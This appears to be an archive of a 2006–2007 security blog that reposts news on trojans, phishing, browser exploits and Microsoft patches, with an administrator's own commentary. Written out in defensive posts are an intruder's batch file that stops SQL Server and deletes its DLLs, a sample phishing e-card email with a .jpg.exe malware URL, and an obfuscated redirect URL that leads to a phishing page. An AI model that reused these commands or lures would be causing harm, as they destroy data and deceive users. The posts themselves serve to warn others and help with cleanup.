PayPal and MySpace.com are among the major Web properties that have been targeted by major JavaScript-based XSS attacks in recent months. More Here

Saturday, March 24, 2007
Another Trojan horse is spreading through the Internet telephone network of Skype Ltd.
The malicious code, known as both Warezov and Stration, is similar to an earlier version detected in February, but with a new URL (uniform resource locator) and a new version of the malicious code, according to an alert posted Thursday by Websense Inc.
Websense warns Skype users to watch for the message "Check up this," with a URL containing a hyperlink.
The code itself isn't self-propogating but when it runs, the URL is sent to everyone on the user's contact list.
When users click on the link, they are redirected to a site that is hosting a file named file_01.exe. Users are then prompted to run the file and if they do, several other files are downloaded and run. The downloaded files are other versions of the Waresov/Stration malicious code.
However, that server doesn't appear to be operating, according to Websense.

Wednesday, March 21, 2007
It's the early 21st Century, the United States is the reigning capital of computer attacks, hackers have become international crime rings, and you can buy a stolen credit card number for as little as $1 or a complete identity for $14.
This might read like near-future science fiction, but it's reality, according to a new security report released Monday by Symantec, covering the last six months of 2006.
The Internet Security Threat Report, issued twice yearly by the computer security firm, paints a grim picture. "Attackers are now refining their methods and consolidating their assets to create global networks that support coordinated criminal activity," the report stated.
While a recent report from McAfee showed that Internet domains from Romania, Russia, and the tiny island of Tokelau were among the riskiest in relative terms, the Symantec report found that the U.S. is the source of about 31 percent of all malicious computer activity, beating China (7 percent) and Germany (7 percent).
As for servers used for buying or selling stolen personal information, 51 percent were located in the U.S.
In most areas profiled in the report, the situation has gotten worse. Nearly 30 percent more computers are part of botnets than the previous six months. Trojans can take over a computer without the user knowing it, turning it into a zombie machine used for pumping out spam, launching denial-of-service attacks, or participating in other nefarious activities at the behest of the remote hackers.
On a given day in the period the report covered, there were an average of about 64,000 active bot computers, with China having the highest number.
If you thought you're seeing more and more junk mail, you're right. Spam makes up an astounding 59 percent of all email traffic, the report said, an increase of 5 percent over the first half of the year.

Wednesday, March 14, 2007
PayPal has been dying! This has got the attention of the media. Which gets more attention from the general public. Which gets more attention of the media. Eventually it'll get the attention of law enforcement. With Enron and MCI going down, people realize again that just because you are a big publicly traded business doesn't mean you are honest. (FAR FROM IT!)
In addition, we've been getting interview requests from additional media. It started with Forbes several months ago. But as each of them pick up the story, so will 10 more. We now have reached "critical mass." We are too big to ignore anymore. So now the media has to pay attention. Now is the time to strike back harder than ever. Not with truck bombs or pipe wielding thugs
but with our keyboards, telephones, and pens.

There are options here is but one.
As promised, Microsoft Corp. did not unveil any security fixes for March. But it did push out several other patches it deemed "high priority," including two for Windows Vista.
The last time Microsoft went a month without releasing security fixes was September 2005.
Among the four updates Microsoft pegged as "non-security, high-priority" today were the usual monthly revamp of the Microsoft Malicious Software Removal Tool and new signatures for the Outlook 2003 and Outlook 2007 antispam filters.
One Vista-specific update was also on the list, as was another that affected both XP and Vista.
The first, dubbed "March 2007 Windows Vista Application Compatibility Update," added compatibility "shims" -- code that makes an application think it's actually running on a pre-Vista PC -- for older Windows titles, including Trend Micro's Internet Security, Windows Server 2003 (SP1) Administration Tools Pack and RealNetworks' RealPlayer 6.0.12.
The second was another revision to the Windows Media Format 11 SDK (software developer's kit) code. In the associated support document, Microsoft said that the update corrected a problem that some portable music players had in synchronizing data with subscription services.
The rare no-patch Tuesday caught some security analysts and professionals trying to figure out how to spend their free time.

Tuesday, March 06, 2007

Monday, March 05, 2007
Security researchers have found a way to use JavaScript to map a home or corporate network and attack connected servers or devices, such as printers or routers.
The malicious JavaScript can be embedded in a Web page and will run without warning when the page is viewed in any ordinary browser, the researchers said. It will bypass security measures such as a firewall because it runs through the user's browser, they said.
"We have discovered a technique to scan a network, fingerprint all the Web-enabled devices found and send attacks or commands to those devices," said Billy Hoffman, lead engineer at Web security specialist SPI Dynamics. "This technique can scan networks protected behind firewalls such as corporate networks."
A successful attack could have significant impact. For example, it could scan your home network, detect a router model and then send it commands to enable wireless networking and turn off all encryption, Hoffman said. Or it could map a corporate network and launch attacks against servers that will appear to come from the inside, he said.
"Your browser can be used to hack internal networks," said Jeremiah Grossman the chief technology officer at Web application security company WhiteHat Security. Both SPI Dynamics and WhiteHat Security came up with the JavaScript-based network scanner at about the same time, he said. The companies plan to talk about their findings at next week's Black Hat security event in Las Vegas.
Full Article

Friday, February 23, 2007
The Storm worm that wreaked havoc in January has opened up a new front in its war against users—instant messaging.
The Trojan virus that was responsible for countless spam e-mails sent around the globe has spawned a new variant that is using AOL Instant Messenger, Google Talk and Yahoo Messenger to proliferate. The worm attacks by detecting when someone is chatting and sending out a message with a link to the first stage of malware on a site. If the user clicks the link, the first stage will execute.
"The botnet handlers will periodically inject new commands into this peer-to-peer network, and one of the first things they do is tell the infected machines to download several executables," explained Jose Nazario, software and security engineer for Arbor Networks.
Click here to read about research showing that IM malware attacks are on the rise.

Saturday, February 17, 2007
Two of the flaws could allow an attacker to execute code on an unpatched system, Apple said. Patches are now available on Apple's Web site or through the Software Update selection under the Apple menu on a Mac.
Apple noted that proof-of-concepts for the flaws were posted on the Month of Apple Bugs Web site. But it doesn't appear that attack code has surfaced using the concepts outlined by the project. Apple has fixed several flaws identified during the course of January by the project, but some remain open.
The two flaws that could lead to arbitrary code execution are found in Finder and iChat. There's a buffer overflow flaw in Finder that could allow an attacker to take control of a system by "enticing a user into mounting a malicious disk image," or tricking someone into enabling local access of a file supposedly stored on a remote server. Apple credited Kevin Finisterre, one of the participants in the Month of Apple Bugs project, for reporting the issue, something it did not do on the three other flaws patched on Thursday.
The other patch, for iChat, fixes an issue in which a user could click on a malicious URL in a chat session and trigger an overflow, possibly opening the system to an attacker.
I cannot understand this from the most arrogant group of people on the planet. The OS that claims to be the best solution known to man has flaws? What next no santa claus or the tooth fairy? Perhaps we may not have to watch the stupid commericals anymore with PC and MAC.

Wednesday, February 14, 2007
In an article posted Feb 13 2007, it appears that our brilliant law enforcement agents have finally figured out that criminals can hang out in unsecure WiFi Hot spots.
What I find so odd about this honestly is that it appears none of them must have ever used one. Honestly if you can attach to any network without some level of difficulty, you should as yourself why? Then disconnect and leave.
According to a report in this week's Washington Post, the 46,000 public access Wi-Fi points scattered across the U.S. offer a new vehicle for criminals to carry out their evil business. Law enforcement authorities, who so far have been focusing their investigations primarily on child pornography and other exploitation of children, say they are growing concerned that the anonymous use of unsecured wireless networks will grow.

Monday, January 01, 2007
This is what the typical Phish looks like as being sampled from the filtering servers. However the urls below are acutally being redirected to: http://manabi-tai.net/postcard.jpg.exe" in the dumps we have sampled. The links here have been removed.
A Greeting Card is waiting for you at our virtual post office! You can pick up your postcard at the following web address:
http://www.all-yours.net/u/view.php?id=a0190313376667
If you can't click on the web address above, you can also
visit E-Greetings at http://www.all-yours.net/
and enter your pickup code, which is: a0190313376667
(Your postcard will be available for 60 days.)
Oh -- and if you'd like to reply with a postcard,
you can do so by visiting this web address:
http://www.all-yours.net/
(Or you can simply click the "reply to this postcard"
button beneath your postcard!)
We hope you enjoy your postcard, and if you do,
please take a moment to send a few yourself!
Regards,
1001 E-Greetings and Postcards
http:///www.all-yours.net/

Sunday, December 31, 2006

We observed large scale spam (mass mailing) of 3 different variants of the W32/Tibs downloader. The message arrives with the subject “Happy New Year” and an attachment “Postcard.exe”. This is a Trojan/Downloader that downloads additional malware onto an infected machine. The downloaded malware harvests e-mail addresses from a victim machine and uploads it to a remote host to further spam. Detection for this was promptly added and definition files released.

This shot was taken off of just one MX Filter server in our network.

This is the weekly shot which will indicate just how many of these are being trapped for saturday.

Thursday, December 28, 2006

Surely anyone can see that the url is first going to google then gets redirected to HongKong. What I find odd is I have seen at least 20 copies of this email in one day yet the provider in HongKong or Google has not taken action.
Our mail servers are already filtering against this URL. http://www.google.com/url?q=%68%74%74%70%3A%2F%2F566441026785887484-ma.%76%68%61%75%65%6F%2E%68%6B/%48S%42C/%73ec%75%72e/l%6Fg%69n/?id=25&account=61b6USrKjUva-0288. It would seem that google could at least assure they are not being party to phishing scams like this and break the URL as well.

Sunday, December 24, 2006
StopBadware.org and the Center for Democracy and Technology (CDT) have teamed up to file a formal complaint with the Federal Trade Commission (FTC) against FastMP3Search.com.ar for distributing badware to unsupecting Internet users.
FastMP3Search.com.ar is a site that offers MP3s for download -- however, it requires users to download a plugin in order to download these songs. Unfortunately, this plugin comes bundled with a ton of adware, Trojan horses, and other forms of badware -- none of which is disclosed to the user. We've written up an in-depth report on the FastMP3Search Plugin that explains all of the bad behaviors that users are subjected to when they download this application. For a summary of those behaviors, check out our blog post. Prof. John Palfrey has also posted his thoughts on the subject on his own blog.
Related links:
StopBadware and CDT's FTC complaint
StopBadware's report on the FastMP3Search Plugin
With Christmas fast approaching, Santa Claus reached out for a little help from Stopbadware.org this week.
The consumer advocacy group said it was approached by an Incline Village, Nevada, man who had legally changed his name to Santa Claus, who asked them to help figure out why his Web site was being flagged by Google's Web site filters.
It turned out that Santa's Web site had been hacked.
On Friday, the Web site was still downloading malicious software, according to Roger Thompson, chief technology officer with Exploit Prevention Labs. It exploits a bug in Internet Explorer that Microsoft patched last August, meaning that people running older versions of the browser could be at risk, Thompson said via instant message.
"The site is hacked," he said. "If you are not patched, it uses an exploit to silently install a huge amount of adware and spyware."
The original problem was soon resolved by Stopbadware.org, but on Friday malware had again cropped up on the Web site.

Saturday, December 09, 2006
It is that time again and these bogus postcards are appearing once again. By now everyone should mouse over any link they think is questionable in your email. Though if anything is questionable just don't do it. Here is a prime example where clicking the link will try to execute an application. Don't find out just don't! No postcard is worth it. The return address is member@PostCard.ORG is not the same site as postcards.org. Both these domains seem legit but then who cares. No postcard or e-card should want you to run a .exe! Seems both should be warning people about the scam.


Sunday, December 03, 2006
I must post this hack which has come to our attention if for no other reason to save some other administrators some time. First I found the exists of a service called network.exe within System32 though as we all know the name is not important. Look for any unknown service running. Search your regkeys and kill the reference that starts this service.
You will know you have the problem when you cannot click on anything within Enterprise Manager like a database or Logins and go to properties. The error will appear related to xpstar.dll at this point. Well you can copy them from another SQL install or simply run SP4 SQL 2000 again. But this only fixes SQL it does not get to the root of the problem.
The cause is a .bat or .cmd which has been inserted to do the dirty work. Search your system for the offending, in this case it was known as a761.bat but again it can be named anything. So remove the registry entry that tells the bat to run when you logon. Or you have not beat anything yet.

So lets look at the .bat file.
net stop mssqlserver
net stop mssqlserver /Y
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\odsole70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xplog70.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\odsole70.dll
net start mssqlserver
So after we are done making sure the bad code has been removed then make sure the files are in place, as I said this can be done either copying them or reinstall SP4 for SQL 2000.

I won't go into how we stop the badguy from returning. That is up to each administrator what method you want to take. I offer this only as a way to get you out of trouble and allow you the time to think about how they did it and how to prevent it.

Thursday, November 30, 2006
A critical security vulnerability in an ActiveX control used by Internet Explorer could allow malicious hackers to use Adobe's Reader and Acrobat software to launch PC hijack attacks, according to a warning from Adobe Systems.
The San Jose, Calif., company released a security support advisory with pre-patch workarounds and warned that multiple unpatched flaws could cause software crashes and "potentially allow an attacker to take control of the affected system."
Affected software includes Adobe Reader 7.0.0 through 7.0.8 and Adobe Acrobat Standard and Professional 7.0.0 through 7.0.8 on the Windows platform. The bugs are only triggered when using Internet Explorer. Users of other browsers are not affected.
Adobe said it is working on a comprehensive patch that will ship "soon" and stressed than an upcoming upgrade to the widely used Adobe Reader program is vulnerable to this issue.

Monday, November 27, 2006
It appears people still have no ability to know when they are being scammed. It those people we are going to focus on. Since you seem to not know who you are please just read this and of course look at the powerpoint presentation.
Though some useful tips are when you go to a ATM take your cell phone with you. If someone is being overly friendly take plenty of pictures. If the bank is open just go inside. What ever the situation never let your PIN be revealed, NEVER is there a need for a third hand NEVER.
If you have taken plenty of pictures of Mr. friendly trying to help. If you go outside empty handed make sure to take pictures of anyone else out in the open. It will be clear who that person is when Mr. friendly and the other person meetup and leave together. If there is a vehicle take the License number too. Though I doubt once you start clicking the person inside these people are going to feel comfortable enough to drive away. Though you still have the edge since they are assuming you are a chump.
ATM_THEFTS.pps (557.5 KB)

Friday, November 24, 2006
Just a few years ago Windows users, even responsible Windows users, had good reason to be fearful of the attack that would slip past their defenses or their notice. Things have changed. Nobody should ever be complacent, but a responsible user can be confident that defensive software and good habits will protect them. More interestingly, attacks just aren't what they used to be.
A report by Alexander Gostev, senior virus analyst at Kaspersky Lab, indicates that innovation in malware development is stagnant. There have been no major developments in some time. In fact, there have been no major attacks since the release of Zotob in August 2005.
Zotob, incidentally, targeted mainly Windows 2000 systems and XP SP1 to a lesser degree. What Microsoft has been saying about XP SP2 is true: Users are much safer running XP SP2 than earlier versions of Windows. Their own data from their Malicious Software Removal Tool (Word .doc file) shows as much, and in fact probably understates the matter.
There have been a number of small attacks. Some of them, like the WMF vulnerability, enter in the background of the malware scene and will be with us for a long time. Perhaps the most prominent security term of 2006 was "targeted attack." We had quite a few of them, mostly centered around zero-day vulnerabilities in Microsoft Office. See the Kaspersky report for more interesting details on these vulnerabilities.
The focus on vulnerabilities generally is another point in the report. There is little innovation anymore in malware—except where it involves the exploit of a vulnerability, especially a zero-day exploit. But even these are often less of a threat than they used to be. A few years ago vulnerabilities brought us attacks like Blaster and Sasser, where users could be infected over the Internet while they were asleep. Now the exploit usually involves substantial user action and can often be blocked by anti-virus software
Using Mozilla Firefox's built-in Password Manager to keep track of your browser's passwords? It makes site logins faster but it also could help malicious sites steal your passwords. The bug, which has been known to Mozilla for at least 10 days, remains unpatched and exploits as well as a proof of concept exist in the wild.
"I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!" Security Researcher Robert Chapin wrote in a November 12th e-mail posted in the bugzilla bug tracking system.
"The underlying method was so obvious that it should have raised multiple warnings," Chapin continued. "There were none at all."
The flaw allows a maliciously crafted page to auto-fill a form with credentials intended for another site. Apparently, there is no warning in Firefox 2.0 or previous versions that the credentials are being pulled for the wrong site and submitted to a third party. Details of the flaw first became public this week. Mozilla developers do not yet have a fix.
"Since this bug is an in-the-wild attack we're not protecting anyone by hiding the details anyway," Mozilla developer Daniel Veditz wrote in a bugzilla entry. "Up to now, browser makes have focused on user convenience and assumed sites with valuable passwords would be well-written. But they have bugs just like we have bugs so we might have to be more defensive." Solutions? Surf carefully.
Or just don't use the feature until a fix comes out. Security outfit (FriST) recommends that users disable the "Remember passwords for sites" feature in the Options menu.
Microsoft Corp. has initiated 97 lawsuits throughout Europe and the Middle East during its eight-month investigation into fraudulent Web pages, with another 32 criminal complaints filed in cooperation with local authorities, the company said Wednesday.
All of the cases are against individuals who attempted to capture the login and password details of users by constructing fraudulent Hotmail and MSN.com sign-in pages, said Jean-Christophe Le Toquin, a Microsoft attorney. A total of 253 sites were investigated, he said. Microsoft's Global Phishing Enforcement program, started in March, aims to curtail fake Web sites built by criminals trying to obtain financial information or passwords by tricking users, so-called "phishing." The company uses its technology to crawl the Internet to find Web pages that look suspicious.
Once a phishing site has been identified, Microsoft either files a criminal complaint or forwards the information to prosecutors, depending on the country’s legal requirements. By country, Turkey led the pack with 50 criminal complaints, followed by 28 in Germany and 11 in France. Legal actions were also filed in the United Arab Emirates, Italy, Morocco, the Netherlands and the U.K.
Microsoft has settled with four phishers, all 16- to 20-year-old males, in France and Norway, Le Toquin said. Each of those pursued in France paid Microsoft $2,564, a fine the company felt is in proportion to their actions, he said.
Many of the fake sites were created by the phishers to trick their peers into divulging their login credentials. The phishers would try to lure their friends to the fake pages through links sent by instant messaging programs. Microsoft said it will continue its investigation, particularly focusing on phishing sites connected with more sophisticated hacking.
An independent vulnerability analyst working as part of the "Month of Kernel Bugs" campaign released the details necessary to attack the hole in OS X on Nov. 22, revealing the manner in which hackers could target the glitch, which affects the way Apple's software handles disk image files.
The researcher, identified only by the screen name "LMH," issued the exploit via a post on the Kernel Fun Web site. "Mac OS X fails to properly handle corrupted image structures, leading to an exploitable denial of service condition," LMH wrote in his latest blog.
"Although it hasn't been checked further, memory corruption is present under certain conditions." The researcher said that the demonstration exploit offered on the site would be unlikely to allow arbitrary code execution if applied by attackers, however, the analyst indicated that the flaw could be taken advantage of by malware writers by targeting the manner in which Cupertino, Calif.-based Apple's Safari browser downloads online image files.
Apple representatives didn't comment on the exploit.
Security researchers at Secunia rated the exploit as "highly critical," the software company's second most severe threat ranking, and said the attack could be used by local users to gain escalated privileges and utilized by malware writers to compromise a vulnerable system.
The Copenhagen, Denmark-based firm specifically said that the vulnerability is caused due to an error in the OS X AppleDiskImageController when the system is handling corrupted image files and can be exploited to cause a memory corruption.
Such an attack could lead to execution of arbitrary code in kernel-mode, Secunia said in a post to its Web site.

Tuesday, November 21, 2006
Vista and Office 2007 have just finished development and are being made available to corporate customers in advance of their January 30 release. But if you know where to look online, you can find both products already.
In the case of Vista, the purported "crack" isn't really a crack to get around the activation process. According to the techie hobbyist site Ars Technica, the hackers replaced components in the final code with bits from from earlier betas of Vista.
This allows the would-be pirate to use a product key that worked with the betas and two release candidates and skip the entire activation process.
In the case of Office 2007, the Enterprise edition has leaked onto the Internet, and because it uses a volume license key, it does not require activation over the Internet.
The free ride won't last long. Microsoft said it was aware of the hacks, and how they were done. "The unauthorized download relies on the use of pre-RTM activation keys that will be blocked using Microsoft's Software Protection Platform. Consequently, these downloads will be of limited use says Microsoft.
Beyond the fact that the hacked software will be shut off, installing it is just crazy, claimed Greg DeMichillie, lead analyst with research firm Directions on Microsoft.
"A whole lot of the versions of Windows XP that show up on download sites aren't just modified to bypass activation. They carry spyware. So you install them and they could immediately turn into zombies or botnets.
He pointed out that it's possible even to install a rootkit despite Vista's vaunted PatchGuard kernel protection. The rootkit can be installed to the files on the installation, which are merely compressed and not installed yet.

Sunday, November 12, 2006
It is amazing that for whatever reason people just don't get it. JUST DON'T CLICK! Nothing anyone has to sell, give away or try to lure you with via email is worth the risk.
Based on a survey of 5,000 consumers in the United States, Gartner said users are being assaulted with more phishing attacks than ever before and are falling for more of the gimmicks. Yet at the same time, customers are losing less money to the schemes, due to a growing awareness of the online fraud model, as banks and other businesses spoofed in the attacks have put more tools in place to help identify suspicious behavior.
Gartner estimates that 109 million U.S. adults received phishing e-mails during the last 12 months, compared to only 57 million in 2004. An estimated 24.4 million Americans went on to click on phishing e-mails in 2006, up from approximately 11.9 million in 2005. The company said 3.5 million adults gave sensitive information to fraudsters in 2006, compared to only 1.9 million adults last year.
Based on the survey, the average loss per victim has grown from $257 to $1,244 per victim in 2006. Finding a refund for money lost to the schemes has also become harder: Consumers recovered approximately 80 percent of their cash in 2005, but are getting back an average of only 54 percent in 2006.
The analyst said that among the tactics being employed successfully by phishers are efforts that launch and shut down fraudulent Web sites very quickly, so that the attacks become moving targets that are harder to stop using conventional blacklists. The average life span of a phishing site has dropped to roughly 1 hour in 2006, whereas was approximately one week in 2004. Litan said attackers may have already begun to create customized phishing schemes that target specific people, specifically those who appear to have more money than the average Web user.

Monday, November 06, 2006
An FBI investigation of an international ring of phishers that used the Internet to swap stolen IDs and credit cards - including information of customers of a "major financial institution" -- netted 17 hackers in the U.S. and Eastern Europe, federal law enforcement officials said.
Four U.S. arrests were made, along with 13 in Poland, including the alleged ringleader nicknamed "Blindroot." The probe, dubbed "Operation Cardkeeper," began after a "major financial institution" reported numerous phishing attacks between August and October 2004, according to FBI spokesperson Paul Bresson.
According to the FBI office in Richmond, Virginia, the group "compromised" around 50 servers in the area that were then used to launch the attacks. A common tactic of phishers is to take control of systems in order to deliver spam or porn.
The government investigation also revealed an Internet bazaar where identity thieves meet to swap stolen personal data. The forums were used "by both U.S. citizens and foreign nationals to commit financial crimes," according to the FBI.
Although no financial figures were released on how much was lost due to the phishing attacks, "hundreds of thousands of dollars" are saved when stolen financial data is intercepted by the FBI, James E. Finch, assistant director of the agency's Cyber Division said in a statement. "Cyber criminals will no longer be able to hide behind borders to conduct their illicit business," Finch said.
The government said 15 search warrants were issued, including in New York, Georgia, Nebraska, Tennessee, Ohio and Texas. Romania law enforcement are also questioning subjects.

Sunday, October 22, 2006
Joe Stewart, senior security researcher at SecureWorks, has posted an analysis of a Trojan program called SpamThru on his company's Web site. As far as malware goes, it's a marvel.
SpamThru features a custom P2P protocol to share information with other bot-infected or compromised machines. In the event that the command-and-control server gets shut down, the spammer can redirect the hacked peers to a new master server.
SpamThru defends itself against antivirus software by rewriting the hosts file on the infected machine so virus updates can't be found. It also uses its own antivirus engine to eliminate other resident malware that might compete for resources or expose the compromised machine.
It contains its own template-driven spamming engine that's protected by AES (Rijndael) encryption. And it can generate randomized spam images to defeat pattern-based spam detection methods.
Although we've seen automated spam networks set up by malware before (Sober, Bobax, Bagle, etc) this is one of the more sophisticated efforts," writes Stewart. The complexity and scope of the project rivals some commercial software. Clearly the spammers have made quite an investment in infrastructure in order to maintain their level of income.

Tuesday, October 10, 2006
In one of its biggest releases in recent months, Microsoft Corp. today issued 10 security bulletins detailing fixes for more than two dozen separate vulnerabilities -- several of which are already being actively exploited in the wild.
But the updates were not immediately available via Microsoft Update, Automatic Update or Windows Update Services because of what the company described as "technical difficulties."
"Technical teams are engaged and have been working around the clock" to make the updates available by the end of day today, the company said in a statement. "To be clear, it's a delay due to the networking for these systems," said a post on Microsoft's security response center blog said this afternoon. "There are no issues with the security updates themselves." The delay does not affect customers using Microsoft's Software Update Services, Windows Update V4 or Office Update.
Those who want to download the patches immediately can do so manually by visiting Microsoft's technet site, the blog post said.
Six of the bulletins announced today are rated as critical by Microsoft and detail fixes for a total of 16 separate flaws. The rest of the bulletins addressed vulnerabilities that were either rated as important or moderate by Microsoft.
The bulletins covered a total of 26 separate flaws and are part of Microsoft's regularly scheduled monthly security updates for October. The list of products affected includes PowerPoint, Excel and Word.
"What's interesting to note here is that six of the flaws [covered by today's bulletins] are being exploited in the wild or have proof-of-concept code available," said Tom Cross, a vulnerability researcher with Atlanta-based Internet Security Systems Inc.'s X-Force threat analysis service.
Examples of active attacks against flaws fixed today include zero-day exploits against Excel and Word, Symantec Corp. said in an advisory released this afternoon. Similar attacks or proof-of-concept attacks are also available against some of the flaws addressed in security bulletins MS06-057, MS06-058 and MS06-63, Cross said.
"Today we are seeing a record high number of vulnerabilities being patched in a single month," said Monty Izerman, a senior manager of the global threat group at McAfee Avert Labs in an e-mailed comment. Sixteen of the flaws patched today were discovered in application software products and continue a trend toward "application-based malware and application-targeted vulnerabilities," he said.
Of the fixes released today, the one described in MS06-057 is perhaps the most critical, McAfee noted. The critical flaw, which exists in Windows Shell, can be used to take complete control of compromised systems and has already been widely exploited in so-called "drive-by install" and "drive-by download" attacks via Internet Explorer, McAfee cautioned.

Sunday, October 01, 2006
On Thursday, Microsoft warned people about a vulnerability in the Windows Shell, the part of the operating system that presents the user interface. The flaw affects Windows 2000, Windows XP and Windows Server 2003 and could be exploited via the Internet Explorer Web browser through a component called WebViewFolderIcon, the company said in an advisory.
"An attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer," Microsoft said. "An attacker who successfully exploited this vulnerability could gain the same user rights as the local user."
While sample exploit code has been published, Microsoft said it has not yet seen any related attacks. The vulnerability was actually discovered two months ago, but the code only surfaced this week, according to the French Security Incident Response Team.
Security monitoring company Secunia deems the issue "extremely critical," its most severe rating. Microsoft said it is working on a fix and plans to release it on Oct. 10 as part of its regular patch cycle. Meanwhile, it suggested several workarounds in its advisory to protect Windows systems.
On Friday, security company Determina provided a third-party fix for the flaw. It is the second time in as many weeks that an outsider has patched a flaw in a Microsoft product. Microsoft does not recommend using such third-party fixes, saying they could cause compatibility problems.
The Windows Shell bug is one of several flaws that are publicly known and for which exploit code is available, but which Microsoft has yet to patch. Cyber crooks are actively exploiting yet-to-be-fixed holes in PowerPoint, Word and IE, Microsoft has acknowledged.
Miscreants are taunting Microsoft with zero-day code, or attack code released immediately after a flaw or patch is made public, experts have said. Some security watchers have started to coin the term "zero-day Wednesday" to come after "Patch Tuesday," Microsoft's patch day on the second Tuesday of each month. Microsoft put its patches on a schedule to give IT managers time to plan and prepare.

Thursday, September 28, 2006
One day after patching a widely exploited flaw in its Internet Explorer browser, Microsoft Corp. has a new bug to worry about, this time in PowerPoint.
Attackers have been exploiting a newly discovered bug in Microsoft's Office presentation software in extremely targeted attacks, McAfee Inc. reported yesterday. Researchers were made aware of the attacks when a customer submitted two different malicious PowerPoint files, both of which exploited the same vulnerability, said Craig Schmugar, a virus researcher at McAfee. Both files installed malicious remote access Trojan software that then attempted to connect to an outside Web server, he said.
Though McAfee is not releasing technical details of the exploit, the security vendor says that it has confirmed that the attack works on three versions of Office running on the Windows 2000 operating system: Office 2000, Office XP, and Office 2003. Other platforms and other Office applications may also be affected, but McAfee has not yet had time to complete its testing, Schmugar said.
Schmugar has blogged about the issue on the Avert labs site.
Microsoft "has concluded that this issue affects users of Microsoft Office 2000, Microsoft Office 2003, and Microsoft Office XP," the company said in an statement. Microsoft and other security vendors, including Symantec Corp. and McAfee, have added signatures to their security products so that they can detect this malicious code.

Wednesday, September 27, 2006
Microsoft has released an out-of-cycle Internet Explorer update to fix a critical and widely exploited vulnerability, exploiting the Vector Markup Language, but there's a general feeling among security experts that the company is shutting the stable door after the horse has bolted.
Highlighting the risks of releasing security updates on a monthly patching cycle, the software maker's MS-06-055 bulletin comes a full eight days after virus hunters first spotted the zero-day attacks circulating on porn sites hosted in Russia. Security researchers at Sunbelt Software have discovered an active malware attack against fully patched versions of Microsoft's Internet Explorer browser.
In eight days, the bad guys replenished their botnets, made their money and moved on to the next zero-day. Now the industry is struggling to clean up and chase the copycats.
Microsoft has maintained throughout the episode that the attacks were limited in nature, but, according to data from VeriSign's iDefense, approximately 2,000 domains were hijacked and seeded with code to redirect users to hostile VML websites.
HostGator, an ISP based in Houston, said VML attackers compromised its servers via an unrelated zero-day flaw in the cPanel control panel software distributed with hosting accounts and redirected legitimate Web sites to malicious pages hosting VML exploits. The exploits then dumped massive amounts of spyware, Trojans, bots and rootkits onto vulnerable Windows machines.
According to timestamps in the Microsoft bulletin, the company started updating the vulnerable Vgx.dll library on Sep. 18, 2006, the same day researchers at Sunbelt Software detected the exploits in the wild. Seems they cannot continue with their proactive stance when it is clear this at least is reactive.

Monday, September 18, 2006
A British security researcher has figured out a way to manipulate legitimate features in Adobe PDF files to open back doors for computer attacks. David Kierznowski, a penetration testing expert specializing in Web application testing, has released proof-of-concept code and rigged PDF files to demonstrate how the Adobe Reader program could be used to launch attacks without any user action.
"I do not really consider these attacks as vulnerabilities within Adobe. It is more exploiting features supported by the product that were never designed for this, said Kierznowski". "At this point, it is obvious that any malicious code [can] be launched," Kierznowski said.
The use of Web-based exploits to launch drive-by malware downloads is a well-known tactic and the discovery of PDF back doors is further confirmation that desktop programs have become lucrative targets for corporate espionage and other targeted attacks.
"One of the other interesting finds was the fact that you can back-door all Adobe Acrobat files by loading a back-doored JavaScript file into [a local] directory," Kierznowski said in a blog entry that includes the proof-of-concept exploit code.
A spokesperson from Adobe's product security incident response team said the company is aware of Kierznowski's discovery and is "actively investigating" the issue.
"Active exploitation techniques such as buffer overflows are becoming more and more difficult to find and exploit ... The future of exploitation lies in Web technologies," he said, noting that internal users are often in a "relationship of trust" with the surrounding network. Confirming a trend that sees Microsoft Office applications—Word, Excel, PowerPoint—used in zero-day attacks, Kierznowski sees a future of client-side hacking that expands the functionality of a service.
This form of hacking merely manipulates the user's client to perform a certain function, effectively using the user's circle of trust.

Wednesday, September 13, 2006
Microsoft's Patch Tuesday on Sep. 12 brought three bulletins covering a three software flaws, but the day will be remembered most for an Internet Explorer mega-patch that is being re-rereleased to address a 10th vulnerability that was missed by the software maker.
The flaw, which exists in the way IE handles long URLs when visiting Web sites using HTTP 1.1 protocol and compression, was flagged by eEye Digital Security, the same company that had its name zapped from the flaw credits when the update shipped for a second time on Aug. 24.
"We found another problem that they missed, even with the rerelease," said Marc Maiffret, chief hacking officer at eEye, in Aliso Viejo, Calif. The latest bulletin credits eEye with finding the additional bug. According to Tony Chor, group program manager in Microsoft's IE team, the additional flaw was similar to the one that caused the original rerelease but actually existed in a different location.
The embarrassing IE update episode underscores the challenges Microsoft, in Redmond, Wash., faces in shipping patches for multiple browser and operating system versions and strengthens the arguments from critics that the complex nature of the company's widely used software is a major security threat.
Multiple security flaws in Apple's QuickTime media player could put Mac and PC users at risk of malicious hacker attacks, according to a warning from the Cupertino, Calif. company.
Apple released QuickTime 7.1.3 as a high-priority update alongside warnings that maliciously crafted movie and image files could be used to execute harmful code on vulnerable computers.
The update fixes a total of seven vulnerabilities, including an integer overflow that occurs when viewing maliciously crafted movies that use the H.264 digital video codec standard.
By carefully crafting a corrupt H.264 movie, an attacker can trigger an integer overflow or buffer overflow which may lead to an application crash or arbitrary code execution with the privileges of the user, Apple warned in an advisory. The QuickTime update addresses the issue by performing additional validation of H.264 movies.
The company also warned that specially rigged QuickTime movies can lead to an application crash or arbitrary code execution because of a separate buffer overflow bug in the program. A third flaw in the way QuickTime deals with corrupt FLC movie could also lead to arbitrary code execution.

Tuesday, September 05, 2006
Malicious hackers broke into one of AT&T Inc.'s computer networks and stole credit card data and other personal information from several thousand customers who shopped at the telecommunications giant's online store.
The company said it discovered the breach last weekend for its online DSL services. Someone apparently broke into the system and glimpsed personal information from several thousand customers who purchased DSL equipment through the company's online Web store.
AT&T said it was notifying "fewer than 19,000" customers whose data was accessed during the weekend break-in, which it said was detected within hours. The company said it immediately shut down the online store, notified credit card companies and was working with law enforcement agencies to track down the hackers.
While AT&T didn't provide information about the root cause of the attack, Shlomo Kramer, CEO of security appliance maker Imperva, said there is a greater than 50 percent chance the attack was internal, perhaps by an employee.
